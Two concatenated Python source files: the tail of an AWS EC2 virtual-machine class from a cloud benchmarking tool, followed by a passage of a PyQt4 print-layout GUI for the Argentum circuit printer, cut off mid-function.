vm_util.GetPublicKeyPath()] keyfile, _ = vm_util.IssueRetryableCommand(cat_cmd) import_cmd = util.AWS_PREFIX + [ 'ec2', '--region=%s' % self.region, 'import-key-pair', '--key-name=%s' % 'perfkit-key-%s' % FLAGS.run_uri, '--public-key-material=%s' % keyfile] vm_util.IssueRetryableCommand(import_cmd) self.imported_keyfile_set.add(self.region) if self.region in self.deleted_keyfile_set: self.deleted_keyfile_set.remove(self.region) def DeleteKeyfile(self): """Deletes the imported keyfile for a region.""" with self._lock: if self.region in self.deleted_keyfile_set: return delete_cmd = util.AWS_PREFIX + [ 'ec2', '--region=%s' % self.region, 'delete-key-pair', '--key-name=%s' % 'perfkit-key-%s' % FLAGS.run_uri] vm_util.IssueRetryableCommand(delete_cmd) self.deleted_keyfile_set.add(self.region) if self.region in self.imported_keyfile_set: self.imported_keyfile_set.remove(self.region) @vm_util.Retry() def _PostCreate(self): """Get the instance's data and tag it.""" describe_cmd = util.AWS_PREFIX + [ 'ec2', 'describe-instances', '--region=%s' % self.region, '--instance-ids=%s' % self.id] logging.info('Getting instance %s public IP. This will fail until ' 'a public IP is available, but will be retried.', self.id) stdout, _ = vm_util.IssueRetryableCommand(describe_cmd) response = json.loads(stdout) instance = response['Reservations'][0]['Instances'][0] self.ip_address = instance['PublicIpAddress'] self.internal_ip = instance['PrivateIpAddress'] self.group_id = instance['SecurityGroups'][0]['GroupId'] util.AddDefaultTags(self.id, self.region) def _CreateDependencies(self): """Create VM dependencies.""" self.ImportKeyfile() def _DeleteDependencies(self): """Delete VM dependencies.""" self.DeleteKeyfile() def _Create(self): """Create a VM instance.""" super(AwsVirtualMachine, self)._Create() placement = 'AvailabilityZone=%s' % self.zone if IsPlacementGroupCompatible(self.machine_type): placement += ',GroupName=%s' % self.network.placement_group.name block_device_map = GetBlockDeviceMap(self.machine_type) create_cmd = util.AWS_PREFIX + [ 'ec2', 'run-instances', '--region=%s' % self.region, '--subnet-id=%s' % self.network.subnet.id, '--associate-public-ip-address', '--image-id=%s' % self.image, '--instance-type=%s' % self.machine_type, '--placement=%s' % placement, '--key-name=%s' % 'perfkit-key-%s' % FLAGS.run_uri] if block_device_map: create_cmd.append('--block-device-mappings=%s' % block_device_map) stdout, _, _ = vm_util.IssueCommand(create_cmd) response = json.loads(stdout) self.id = response['Instances'][0]['InstanceId'] def _Delete(self): """Delete a VM instance.""" delete_cmd = util.AWS_PREFIX + [ 'ec2', 'terminate-instances', '--region=%s' % self.region, '--instance-ids=%s' % self.id] vm_util.IssueCommand(delete_cmd) def _Exists(self): """Returns true if the VM exists.""" describe_cmd = util.AWS_PREFIX + [ 'ec2', 'describe-instances', '--region=%s' % self.region, '--filter=Name=instance-id,Values=%s' % self.id] stdout, _ = vm_util.IssueRetryableCommand(describe_cmd) response = json.loads(stdout) reservations = response['Reservations'] assert len(reservations) < 2, 'Too many reservations.' if not reservations: return False instances = reservations[0]['Instances'] assert len(instances) == 1, 'Wrong number of instances.' status = instances[0]['State']['Name'] assert status in INSTANCE_KNOWN_STATUSES, status return status in INSTANCE_EXISTS_STATUSES def CreateScratchDisk(self, disk_spec): """Create a VM's scratch disk. Args: disk_spec: virtual_machine.BaseDiskSpec object of the disk. """ # Instantiate the disk(s) that we want to create. if disk_spec.disk_type == disk.LOCAL: disks = [] for _ in range(disk_spec.num_striped_disks): local_disk = aws_disk.AwsDisk(disk_spec, self.zone) local_disk.device_letter = chr(ord(DRIVE_START_LETTER) + self.local_disk_counter) self.local_disk_counter += 1 disks.append(local_disk) if self.local_disk_counter > self.max_local_disks: raise errors.Error('Not enough local disks.') else: disks = [aws_disk.AwsDisk(disk_spec, self.zone) for _ in range(disk_spec.num_striped_disks)] self._CreateScratchDiskFromDisks(disk_spec, disks) def GetLocalDisks(self): """Returns a list of local disks on the VM. Returns: A list of strings, where each string is the absolute path to the local disks on the VM (e.g. '/dev/sdb'). """ return ['/dev/xvd%s' % chr(ord(DRIVE_START_LETTER) + i) for i in xrange(NUM_LOCAL_VOLUMES[self.machine_type])] def SetupLocalDisks(self): """Performs AWS specific setup of local disks.""" # Some images may automount one local disk, but we don't # want to fail if this wasn't the case. self.RemoteCommand('sudo umount /mnt', ignore_failure=True) def AddMetadata(self, **kwargs): """Adds metadata to the VM.""" util.AddTags(self.id, self.region, **kwargs) class DebianBasedAwsVirtualMachine(AwsVirtualMachine, package_managers.AptMixin): pass class RhelBasedAwsVirtualMachine(AwsVirtualMachine, package_managers.YumMixin): pass
#!/usr/bin/python # -*- coding: utf-8 -*- """ Argentum Control GUI Copyright (C) 2013 Isabella Stevens Copyright (C) 2014 Michael Shiel Copyright (C) 2015 Trent Waddington This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. """ import sys import os import shutil import threading import time from PyQt4 import QtGui, QtCore, QtSvg from gerber import Gerber import requests from setup import VERSION, BASEVERSION, CA_CERTS import tempfile printPlateDesignScale = [1.0757, 1.2256] # * printArea imageScale = [ 23.70, 23.70] # * print = pixels class PrintView(QtGui.QWidget): layout = None layoutChanged = False printThread = None dragging = None resizing = None selection = None selection2 = None def __init__(self, argentum): super(PrintView, self).__init__() self.argentum = argentum self.lastRect = QtCore.QRect() self.lastCheckForChanges = time.time() self.progress = PrintProgressDialog(self) self.progress.setWindowTitle("Printing") self.progress.hide() QtCore.QTimer.singleShot(100, self.progressUpdater) self.fanSpeed = 4 QtCore.QTimer.singleShot(1000 / self.fanSpeed, self.fanAnimator) self.printPlateArea = PrintRect(0, 0, 285, 255) self.printArea = PrintRect(24, 73, 247, 127) self.printLims = PrintRect(10, 14, 157, 98) self.rollLims = PrintRect(80, 14, 87, 98) self.printPlateDesign = QtSvg.QSvgRenderer("printPlateDesign.svg") self.trashCan = QtSvg.QSvgRenderer("trashCan.svg") self.trashCanOpen = QtSvg.QSvgRenderer("trashCanOpen.svg") self.showTrashCanOpen = False height = self.printArea.height * printPlateDesignScale[1] self.printPlateDesignArea = PrintRect(12, 50, self.printArea.width * printPlateDesignScale[0], height) self.images = [] self.setAcceptDrops(True) self.setMouseTracking(True) self.kerfPen = QtGui.QPen(QtGui.QColor(0, 0, 0)) self.kerfPen.setWidth(10) self.kerfPen.setCapStyle(QtCore.Qt.RoundCap) self.kerfOutlinePen = QtGui.QPen(QtGui.QColor(255, 255, 255)) self.kerfOutlinePen.setWidth(13) self.kerfOutlinePen.setCapStyle(QtCore.Qt.RoundCap) self.fanImage1 = QtGui.QPixmap("fan1.png") self.fanImage2 = QtGui.QPixmap("fan2.png") self.printHeadPixmap = QtGui.QPixmap("printhead.png") self.printHeadImage = PrintImage(self.printHeadPixmap, "") self.printHeadImage.minLeft = -24 + 10 self.printHeadImage.left = self.printHeadImage.minLeft self.printHeadImage.minBottom = -73 + 11 self.printHeadImage.bottom = self.printHeadImage.minBottom #self.printHeadImage.width = 95 #self.printHeadImage.height = 90 self.printHeadImage.width = 98 self.printHeadImage.height = 95 self.images.append(self.printHeadImage) self.colorPicker = QtGui.QColorDialog() self.pickColorFor = None self.colorPicker.colorSelected.connect(self.colorPicked) self.showingPrintHead = False self.printButton = QtGui.QPushButton("Print") self.printButton.clicked.connect(self.startPrint) mainLayout = QtGui.QVBoxLayout() layout = QtGui.QHBoxLayout() layout.addStretch() layout.addWidget(self.printButton) layout.addStretch() mainLayout.addStretch() mainLayout.addLayout(layout) self.setLayout(mainLayout) self.imageList = ImageList(self) def updatePrintHeadPos(self, pos): if self.dragging == self.printHeadImage: return (xmm, ymm, x, y) = pos self.printHeadImage.left = self.printHeadImage.minLeft + xmm self.printHeadImage.bottom = self.printHeadImage.minBottom + ymm self.printHeadImage.screenRect = None self.update() def showPrintHeadActionTriggered(self): if self.showingPrintHead: self.showingPrintHead = False else: self.showingPrintHead = True self.argentum.updatePosDisplay() self.update() def showPrintLimsActionTriggered(self): self.update() def showRollLimsActionTriggered(self): self.update() def ratePrintActionTriggered(self): rateDialog = RateYourPrintDialog(self) rateDialog.exec_() def nozzleTestActionTriggered(self): pi = self.addImageFile("BothCartridgesNew.hex") image = QtGui.QImage(pi.pixmap.width(), pi.pixmap.height(), QtGui.QImage.Format_RGB32) image.fill(0xffffff) p = QtGui.QPainter() p.begin(image) p.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(0, 0, 0)), 10, QtCore.Qt.SolidLine)) m = 20 h = image.height() / 9 for j in range(1, 10): p.drawLine(m, j * h - h/2, image.width()-m, j * h - h/2) p.drawLine(m, 1 * h - h/2, image.width()-m, 5 * h - h/2) p.drawLine(m, 5 * h - h/2, image.width()-m, 9 * h - h/2) p.end() pi.pixmap = QtGui.QPixmap.fromImage(image) def dryActionTriggered(self): if self.printThread != None: print("Already printing!") return self.printCanceled = False self.progress = PrintProgressDialog(self) self.progress.setWindowTitle("Drying") self.progress.setLabelText("Starting up...") self.progress.setValue(0) self.progress.show() self.printThread = threading.Thread(target=self.dryingLoop) self.printThread.dryingOnly = True self.printThread.start() def dryingLoop(self): try: if self.argentum.options["use_rollers"] == False: return except: pass print("Drying mode on.") try: printer = self.argentum.printer printer.command("l E", expect='rollers') for image in self.images: if image == self.printHeadImage: continue if not image.visible: continue print("Jacket drying.") self.setProgress(labelText="Drying " + image.hexFilename) pos = self.printAreaToMove(image.left + image.width - 60, image.bottom + 30) x = pos[0] y = pos[1] sy = y while y - sy < image.height * 80: while self.progress.paused: time.sleep(0.5) printer.moveTo(x, y, withOk=True) printer.waitForResponse(timeout=10, expect='Ok') printer.command("l d", expect='rollers') time.sleep(1.5) left = x - int(image.width * 1.5) * 80 if left < 0: left = 0 while self.progress.paused: time.sleep(0.5) printer.moveTo(left, y, withOk=True) printer.waitForResponse(timeout=10, expect='Ok') printer.command("l r", expect='rollers') time.sleep(1.5) y = y + 30 * 80 printer.command("l e", expect='rollers') finally: if self.printThread.dryingOnly: self.printThread = None self.setProgress(percent=100) self.argentum.printer.home() print("Your jacket is now dry.") def calcScreenRects(self): if self.lastRect == self.rect(): for image in self.images: if image.screenRect == None: image.screenRect = self.printAreaToScreen(image) return self.lastRect = self.rect() # Ensure correct aspect ratio aspectRect = QtCore.QRectF(self.rect()) aspectRatio = aspectRect.width() / aspectRect.height() desiredAspectRatio = (self.printPlateArea.width / self.printPlateArea.height) #print("window {} x {}".format(aspectRect.width(), aspectRect.height())) #print("aspect ratio {}".format(aspectRatio)) #print("desired aspect ratio {}".format(desiredAspectRatio)) if aspectRatio < desiredAspectRatio: height = aspectRect.height() * (aspectRatio / desiredAspectRatio) #print("calculated height {}".format(height)) #print("calculated aspect ratio {}".format(aspectRect.width() / height)) aspectRect.setTop((aspectRect.height() - height) / 2) aspectRect.setHeight(height) else: width = aspectRect.width() / (aspectRatio / desiredAspectRatio) #print("calculated width {}".format(width)) #print("calculated aspect ratio {}".format(width / aspectRect.height())) aspectRect.setLeft((aspectRect.width() - width) / 2) aspectRect.setWidth(width) #print("printPlateRect is {}, {} {} x {}".format(aspectRect.left(), # aspectRect.top(), # aspectRect.width(), # aspectRect.height())) self.printPlateRect = aspectRect # Now we can make the screen rects self.printPlateDesignRect = self.printToScreen(self.printPlateDesignArea) for image in self.images: image.screenRect = self.printAreaToScreen(image) self.trashCanRect = QtCore.QRectF( (self.printPlateDesignRect.left() + self.printPlateDesignRect.width() * 17 / 21), (self.printPlateDesignRect.top() + self.printPlateDesignRect.height() * 5 / 7), self.printPlateDesignRect.width() / 8, self.printPlateDesignRect.height() / 5) ppdr = self.printPlateDesignRect my = 30 mx = 30 self.leftLightsRect = QtCore.QRectF(ppdr.left() - mx - 10, ppdr.top() - my, mx, ppdr.height() + my*2) self.rightLightsRect = QtCore.QRectF(ppdr.right() + mx / 2, ppdr.top() - my, mx, ppdr.height() + my*2) self.bottomLightRects = [] mmx = mx/3 self.bottomLightRects.append(QtCore.QRectF(ppdr.left() + ppdr.width()*0.05, self.leftLightsRect.bottom() + my, mmx, mmx)) self.bottomLightRects.append(QtCore.QRectF(ppdr.left() + ppdr.width()/2 - mmx/2, self.leftLightsRect.bottom() + my, mmx, mmx)) self.bottomLightRects.append(QtCore.QRectF(ppdr.right() - ppdr.width()/13, self.leftLightsRect.bottom() + my, mmx, mmx)) self.leftKerfRect = QtCore.QRectF(ppdr.left() - mx*2, ppdr.bottom(), mx*2, my*2 + mmx*2) self.rightKerfRect = QtCore.QRectF(ppdr.right(), ppdr.bottom(), mx*2, my*2 + mmx*2) self.fanImage = self.fanImage1 fw = ppdr.width() / 13 self.leftFanRect = QtCore.QRectF(ppdr.left(), ppdr.top() - fw*2, fw, fw) self.rightFanRect = QtCore.QRectF(ppdr.right() - fw, ppdr.top() - fw*2, fw, fw) def printToScreen(self, printRect): #print("printRect {}, {} {} x {}".format(printRect.left, # printRect.bottom, # printRect.width, # printRect.height)) #print("printPlateArea {} x {}".format(self.printPlateArea.width, # self.printPlateArea.height)) left = (self.printPlateRect.left() + printRect.left / self.printPlateArea.width * self.printPlateRect.width()) top = (self.printPlateRect.top() + self.printPlateRect.height() - (printRect.bottom + printRect.height) / self.printPlateArea.height * self.printPlateRect.height()) width = (printRect.width / self.printPlateArea.width * self.printPlateRect.width()) height = (printRect.height / self.printPlateArea.height * self.printPlateRect.height()) #print("on screen {}, {} {} x {}".format(left, top, width, height)) return QtCore.QRectF(left, top, width, height) def printAreaToScreen(self, printRect): p = PrintRect(self.printArea.left + printRect.left, self.printArea.bottom + printRect.bottom, printRect.width, printRect.height) return self.printToScreen(p) def printAreaToMove(self, offsetX, offsetY): fudgeX = -80 fudgeY = -560 x = offsetX * 80 + fudgeX y = offsetY * 80 + fudgeY x = int(x) y = int(y) return (x, y) def screenToPrintArea(self, x, y): r = self.printToScreen(self.printArea) dx = x - r.left() dy = y - r.top() return (dx * self.printArea.width / r.width(), self.printArea.height - dy * self.printArea.height / r.height()) def updateTitle(self): if self.layout: name = os.path.basename(self.layout) if name.find('.layout') == len(name)-7: name = name[:len(name)-7] self.argentum.setWindowTitle(name + " - Argentum Control") else: self.argentum.setWindowTitle("Argentum Control") def paintEvent(self, event): self.updateTitle() self.calcScreenRects() qp = QtGui.QPainter() qp.begin(self) qp.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(255, 255, 255)), 1, QtCore.Qt.SolidLine)) qp.fillRect(self.rect(), QtGui.QColor(0,0,0)) self.printPlateDesign.render(qp, self.printPlateDesignRect) if self.argentum.showPrintLimsAction.isChecked(): printLimsScreenRect = self.printAreaToScreen(self.printLims) qp.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(255, 255, 255)), 1, QtCore.Qt.DashLine)) qp.drawRect(printLimsScreenRect) qp.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(255, 255, 255)), 1, QtCore.Qt.SolidLine)) if self.argentum.showRollLimsAction.isChecked(): rollLimsScreenRect = self.printAreaToScreen(self.rollLims) qp.drawRect(rollLimsScreenRect) if self.dragging and self.dragging != self.printHeadImage: if self.showTrashCanOpen: self.trashCanOpen.render(qp, self.trashCanRect) else: self.trashCan.render(qp, self.trashCanRect) for image in self.images: if image == self.printHeadImage: continue if not image.visible: continue if image == self.selection or image == self.selection2: r = QtCore.QRectF(image.screenRect) r.setLeft(r.left()-1) r.setTop(r.top()-1) r.setWidth(r.width()+2) r.setHeight(r.height()+2) qp.fillRect(r, QtGui.QColor(0, 54, 128)) qp.drawPixmap(image.screenRect, image.pixmap, image.pixmapRect()) if self.showingPrintHead: image = self.printHeadImage qp.drawPixmap(image.screenRect, image.pixmap, image.pixmapRect()) if self.argentum.printer.connected and self.argentum.printer.lightsOn: qp.setBrush(QtGui.QColor(0xff, 0xff, 0xff)) else: qp.setBrush(QtGui.QColor(0xc6, 0xac, 0xac)) qp.setPen(QtGui.QColor(0, 0, 0)) qp.drawRoundedRect(self.leftLightsRect, 20.0, 15.0) qp.drawRoundedRect(self.rightLightsRect, 20.0, 15.0) for r in self.bottomLightRects: qp.drawRect(r) qp.setPen(self.kerfOutlinePen) qp.drawArc(self.leftKerfRect, 180*16, 90*16) qp.setPen(self.kerfPen) qp.drawArc(self.leftKerfRect, 180*16, 90*16) qp.setPen(self.kerfOutlinePen) qp.drawArc(self.rightKerfRect, 270*16, 90*16) qp.setPen(self.kerfPen) qp.drawArc(self.rightKerfRect, 270*16, 90*16) fanImage = self.fanImage1 if self.argentum.printer.leftFanOn: fanImage = self.fanImage qp.drawPixmap(self.leftFanRect, fanImage, QtCore.QRectF(fanImage.rect())) fanImage = self.fanImage1 if self.argentum.printer.rightFanOn: fanImage = self.fanImage qp.drawPixmap(self.rightFanRect, fanImage, QtCore.QRectF(fanImage.rect())) qp.end() def gerberToPixmap(self, inputFileName): try: f = open(inputFileName, "r") contents = f.read() f.close() except: return None if contents[:1] != "G" and contents[:1] != '%': return None g = Gerber() g.parse(contents) if len(g.errors) > 0: str = "Errors parsing Gerber file {}\n".format(inputFileName) for error in g.errors: lineno, msg = error str = str + "{}: {}\n".format(lineno, msg) QtGui.QMessageBox.information(self, "Invalid Gerber file", str) return False r = QtSvg.QSvgRenderer(QtCore.QByteArray(g.toSVG())) print("Gerber size {} x {} {}".format(g.width, g.height, g.units)) if g.units == "inches": pixmap = QtGui.QPixmap(g.width * 25.4 * imageScale[0], g.height * 25.4 * imageScale[1]) else: pixmap = QtGui.QPixmap(g.width * imageScale[0], g.height * imageScale[1]) p = QtGui.QPainter(pixmap) r.render(p, QtCore.QRectF(pixmap.rect())) if pixmap.width() / imageScale[0] > 230 or pixmap.height() / imageScale[1] > 120: QtGui.QMessageBox.information(self, "Gerber file too big", "The design provided is too big for the print area. It will be resized to fit, but this is probably not what you want.") return pixmap def pixmapFromHexFile(self, inputFileName): f = open(inputFileName) lines = f.read().split('\n') f.close() width = 800 height = 0 theight = 0 for line in lines: if line.startswith('M Y -'): h = int(line[5:]) if h > height: height = h elif line.startswith('M X -'): w = int(line[5:]) width += w elif line.startswith('M Y'): theight += int(line[4:]) print("height={} theight={}".format(height, theight)) if height == 0: height = theight else: height -= (104 * 2) * 4 # blank lines print("{}x{}".format(width, height)) image = QtGui.QImage(width / 4, height / 4, QtGui.QImage.Format_RGB32) image.fill(0xffffff) p = QtGui.QPainter() p.begin(image) p.setFont(QtGui.QFont('arial', 80)) lotshex = "hex " for i in range(10): lotshex = lotshex + lotshex p.drawText(image.rect(), QtCore.Qt.TextWordWrap, lotshex) p.end() return QtGui.QPixmap.fromImage(image) def pixmapFromFilename(self, inputFileName): if inputFileName.endswith(".hex"): pixmap = self.pixmapFromHexFile(inputFileName) try: shutil.copy(inputFileName, self.argentum.filesDir) except: pass else: pixmap = QtGui.QPixmap(inputFileName) if pixmap == None or pixmap.isNull(): pixmap = self.gerberToPixmap(inputFileName) if pixmap == False: return None if pixmap == None or pixmap.isNull(): QtGui.QMessageBox.information(self, "Invalid image file", "Can't load image " + inputFileName) return None if inputFileName[-4:] == ".svg": # Assume SVG files are in millimeters already pixmap = pixmap.scaled(pixmap.width() * imageScale[0], pixmap.height() * imageScale[1]) r = QtSvg.QSvgRenderer(inputFileName) p = QtGui.QPainter(pixmap) r.render(p, QtCore.QRectF(pixmap.rect())) return pixmap def addImageFile(self, inputFileName): pixmap = self.pixmapFromFilename(inputFileName) pi = PrintImage(pixmap, inputFileName) self.images.append(pi) self.ensureImageInPrintLims(pi) self.update() self.imageList.update() self.layoutChanged = True return pi def isImageProcessed(self, image): hexFilename = os.path.join(self.argentum.filesDir, image.hexFilename) if not os.path.exists(hexFilename): return False if os.path.getsize(hexFilename) == 0: return False hexModified = os.path.getmtime(hexFilename) if time.time() - hexModified > 7*24*60*60: return False last_printer_options_changed = self.argentum.getOption("last_printer_options_changed", None) if last_printer_options_changed != None and hexModified < last_printer_options_changed: return False imgModified = os.path.getmtime(image.filename) if imgModified < hexModified: if image.lastResized: return image.lastResized < hexModified return True return False def imageProgress(self, y, max_y): if self.printCanceled: return False percent = (y * 100.0 / max_y) if percent > 99: percent = 99 self.setProgress(percent=percent) return True def sendProgress(self, pos, size): if self.printPaused: return "Pause" if self.printCanceled: return False self.setProgress(percent=(20 + self.perImage * pos / size)) return True def processImage(self, image): if image.filename.endswith(".hex"): return ip = self.argentum.getImageProcessor() hexFilename = os.path.join(self.argentum.filesDir, image.hexFilename) try: size = None if image.lastResized != None: width = image.width * imageScale[0] height = image.height * imageScale[1] size = (int(width), int(height)) print("resizing {} to {},{}.".format(hexFilename, size[0], size[1])) print("original size {},{}.".format(image.pixmap.width(), image.pixmap.height())) image.hexFilename = "{}-{}x{}.hex".format( image.hexFilename[:-4], size[0], size[1]) hexFilename = os.path.join(self.argentum.filesDir, image.hexFilename) self.layoutChanged = True ip.sliceImage(image.pixmap.toImage(), hexFilename, progressFunc=self.imageProgress, size=size) except Exception as e: print("error processing {}: {}.".format(image.filename, e)) self.setProgress(labelText="Error processing {}.".format(image.filename)) print("removing {}.".format(hexFilename)) os.remove(hexFilename) raise curPercent = 0 percent = None labelText = None statusText = None missing = None printCanceled = False printPaused = False def setProgress(self, percent=None, incPercent=None, labelText=None, statusText=None, missing=None, canceled=None): if self.printCanceled: raise PrintCanceledException() if percent: self.percent = percent self.curPercent = percent if incPercent: self.curPercent = self.curPercent + incPercent self.percent = self.curPercent if labelText: self.labelText = labelText if statusText: self.statusText = statusText if missing: canceled = True self.missing = missing if canceled: self.printCanceled = canceled def reportMissing(self, missing): # I swear on Poseidon's trident, one day I shall remove the need # for this Sneaker Net bullshit msgbox = QtGui.QMessageBox() msgbox.setWindowTitle("Sneaker Net Required.") msgbox.setText("One or more files are missing from, or different on the printer.") msgbox.setDetailedText('\n'.join(missing)) msgbox.exec_() def progressUpdater(self): QtCore.QTimer.singleShot(100, self.progressUpdater) if self.percent: self.progress.setValue(self.percent) if self.percent == 20: self.update() self.percent = None if self.labelText: self.progress.setLabelText(self.labelText) self.labelText = None if self.statusText: self.argentum.statusBar().showMessage(self.statusText) self.statusText = None if self.progress.wasCanceled() or self.printCanceled: if not self.printCanceled: self.argentum.printer.stop() if self.progress.wasCanceled(): self.argentum.statusBar().showMessage("Print canceled.") self.printCanceled = True self.progress.hide() self.printPaused = self.progress.paused if self.missing: missing = self.missing self.missing = None self.reportMissing(missing) def fanAnimator(self): QtCore.QTimer.singleShot(1000 / self.fanSpeed, self.fanAnimator) if self.argentum.printer.leftFanOn or self.argentum.printer.rightFanOn: if self.fanImage == self.fanImage1: self.fanImage = self.fanImage2 else: self.fanImage = self.fanImage1 self.update() def printCross(self, x, y): pos = self.printAreaToMove(x, y) self.argentum.printer.move(pos[0], pos[1], wait=True) self.argentum.printer.Print("cross.hex", wait=True) def printCrossPattern(self, x, y): self.setProgress(labelText="Printing cross pattern...") self.printCross(x+ 0, y+ 0) self.setProgress(percent=20) self.printCross(x+10, y+ 0) self.setProgress(percent=40) self.printCross(x+20, y+ 0) self.setProgress(percent=60) self.printCross(x+10, y+10) self.setProgress(percent=80) self.printCross(x+10, y+20) self.setProgress(percent=100) def startPrint(self): if len(self.images) == 1: QtGui.QMessageBox.information(self, "Nothing to print", "You can add images to the print view by selecting\nFile -> Import Image or by simply dragging and dropping images onto the layout. All standard image file formats are supported, as well as industry standard Gerber files. You can also cut and paste from any graphics editing program.") return if self.printThread != None: print("Already printing!") return options = PrintOptionsDialog(self) if options.exec_() == options.Rejected: return self.printCanceled = False self.progress = PrintProgressDialog(self) self.progress.setWindowTitle("Printing") self.progress.setLabelText("Starting up...") self.progress.setValue(0) self.progress.show() self.printThread = threading.Thread(target=self.printLoop) self.printThread.passes = options.getPasses() self.printThread.useRollers = options.getUseRollers() self.printThread.alsoPause = options.getAlsoPause() self.printThread.dryingOnly = False self.printThread.start() def printLoop(self): try: self.setProgress(statusText="Printing.") processingStart = time.time() self.setProgress(labelText="Processing images...") self.perImage = 20.0 / (len(self.images) - 1) for image in self.images: if image == self.printHeadImage: continue if not image.visible: continue if not self.isImageProcessed(image): self.setProgress(labelText="Processing image {}.".format(os.path.basename(image.filename))) self.processImage(image) else: print("Skipping processing of image {}.".format(image.filename)) self.setProgress(incPercent=self.perImage) processingEnd = time.time() self.argentum.addTimeSpentProcessingImages(processingEnd - processingStart) if not self.argentum.printer.connected: self.setProgress(labelText="Printer isn't connected.", statusText="Print aborted. Connect your printer.", canceled=True) return if (self.argentum.printer.version == None or self.argentum.printer.majorVersion == 0 and self.argentum.printer.minorVersion < 15): self.setProgress(labelText="Printer firmware too old.", statusText="Print aborted. Printer firmware needs upgrade.", canceled=True) return self.argentum.printer.monitorEnabled = False volts = self.argentum.printer.volt() if volts < 5: self.setProgress(labelText="Please turn on your printer.") while volts < 5: volts = self.argentum.printer.volt() self.setProgress(percent=20, labelText="Starting print.") self.argentum.printer.turnLightsOn() self.argentum.printer.command("l E", expect='rollers') self.argentum.printer.command("l r", expect='rollers') time.sleep(1.5) self.argentum.printer.command("l e", expect='rollers') self.argentum.printer.turnMotorsOn() self.argentum.setSpeed() self.argentum.printer.home(wait=True) # Now we can actually print! printingStart = time.time() for i in range(0, self.printThread.passes): self.setProgress(percent=20, labelText="Starting pass {}".format(i+1)) self.perImage = 79.0 / (len(self.images) - 1) nImage = 0 for image in self.images: if image == self.printHeadImage: continue if not image.visible: continue while self.progress.paused: time.sleep(0.5) if self.printCanceled: raise PrintCanceledException() pos = self.printAreaToMove(image.left + image.width, image.bottom) if image.filename.endswith(".hex"): pos = (pos[0] - 15 * 80, pos[1] + 560 + 25 * 80) self.argentum.printer.moveTo(pos[0], pos[1], withOk=True) response = self.argentum.printer.waitForResponse(timeout=10, expect='Ok') if response: response = ''.join(response) if response.find('/') != -1: self.setProgress(statusText="Print error - ensure images are within print limits.", canceled=True) return self.setProgress(labelText="Pass {}: {}".format(i + 1, image.hexFilename)) path = os.path.join(self.argentum.filesDir, image.hexFilename) while self.progress.paused: time.sleep(0.5) if self.printCanceled: raise PrintCanceledException() if not self.argentum.printer.send(path, progressFunc=self.sendProgress, printOnline=True): self.setProgress(labelText="Printer error.", canceled=True) return nImage = nImage + 1 self.setProgress(percent=(20 + self.perImage * nImage)) printingEnd = time.time() print("printed in {} s".format(printingEnd - printingStart)) self.argentum.addTimeSpentPrinting(printingEnd - printingStart) printingStart = time.time() if self.printThread.useRollers: self.dryingLoop() if self.printThread.alsoPause: self.setProgress(labelText="Pausing before next pass.") if not self.progress.paused: self.progress.pause() self.argentum.printer.moveTo(100, 100, withOk=True) self.argentum.printer.waitForResponse(timeout=10, expect='Ok') while self.progress.paused: time.sleep(0.5) if self.printCanceled: raise PrintCanceledException() printingEnd = time.time() self.argentum.addTimeSpentPrinting(printingEnd - printingStart) printingStart = time.time() self.argentum.printer.home() self.setProgress(statusText='Print complete.', percent=100) printingEnd = time.time() self.argentum.addTimeSpentPrinting(printingEnd - printingStart) except PrintCanceledException: pass except Exception as e: print(e) self.setProgress(statusText="Print error.", canceled=True) raise finally: self.printThread = None self.argentum.printingCompleted = True self.argentum.printer.monitorEnabled = True def movePrintHead(self): xmm = self.printHeadImage.left - self.printHeadImage.minLeft ymm = self.printHeadImage.bottom - self.printHeadImage.minBottom self.argentum.printer.moveTo(xmm * 80, ymm * 80) def inTrashCan(self, image): if image == None: return False if image.screenRect == None: image.screenRect = self.printAreaToScreen(image) return self.trashCanRect.intersect(image.screenRect) def mousePressEvent(self, event): if event.modifiers() == QtCore.Qt.NoModifier: self.selection = None self.selection2 = None else: self.selection2 = None p = self.screenToPrintArea(event.pos().x(), event.pos().y()) if p == None: return px = p[0] py = p[1] for image in reversed(self.images): if image == self.printHeadImage: continue if not image.visible: continue if py >= image.bottom and py < image.bottom + image.height: if px >= image.left and px < image.left + image.width: if event.modifiers() == QtCore.Qt.NoModifier: self.selection = image else: if self.selection == None: self.selection = image else: self.selection2 = image break def mouseReleaseEvent(self, event): if self.dragging: if self.dragging == self.printHeadImage: self.movePrintHead() else: if self.inTrashCan(self.dragging): self.images.remove(self.dragging) self.layoutChanged = True else: self.ensureImageInPrintLims(self.dragging) self.dragging.screenRect = None self.layoutChanged = True elif self.resizing: self.ensureImageInPrintLims(self.resizing) self.resizing.screenRect = None self.layoutChanged = True else: lights = False if self.leftLightsRect.contains(event.pos()): lights = True if self.rightLightsRect.contains(event.pos()): lights = True for light in self.bottomLightRects: if light.contains(event.pos()): lights = True if lights: if self.argentum.printer.lightsOn: self.argentum.printer.turnLightsOff() else: self.argentum.printer.turnLightsOn() if self.leftFanRect.contains(event.pos()): if self.argentum.printer.leftFanOn: self.argentum.printer.turnLeftFanOff() else: self.argentum.printer.turnLeftFanOn() if self.rightFanRect.contains(event.pos()): if self.argentum.printer.rightFanOn: self.argentum.printer.turnRightFanOff() else: self.argentum.printer.turnRightFanOn() kerf = False if self.leftKerfRect.contains(event.pos()): kerf = True if self.rightKerfRect.contains(event.pos()): kerf = True if kerf: if self.colorPicker.isVisible(): self.colorPicker.hide() else: self.colorPicker.show() if self.dragging and self.dragging != self.printHeadImage: self.selection = self.dragging elif self.resizing: self.selection = self.resizing self.dragging = None self.resizing = None self.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor)) self.update() def colorPicked(self, color): self.argentum.printer.command("red {}".format(color.red())) self.argentum.printer.command("green {}".format(color.green())) self.argentum.printer.command("blue {}".format(color.blue())) self.kerfPen.setColor(color) self.update() def ensureImageInPrintLims(self, image): if image == self.printHeadImage: if image.left < image.minLeft: image.left = image.minLeft if image.bottom < image.minBottom: image.left = image.minBottom return if image.left < self.printLims.left: image.left = 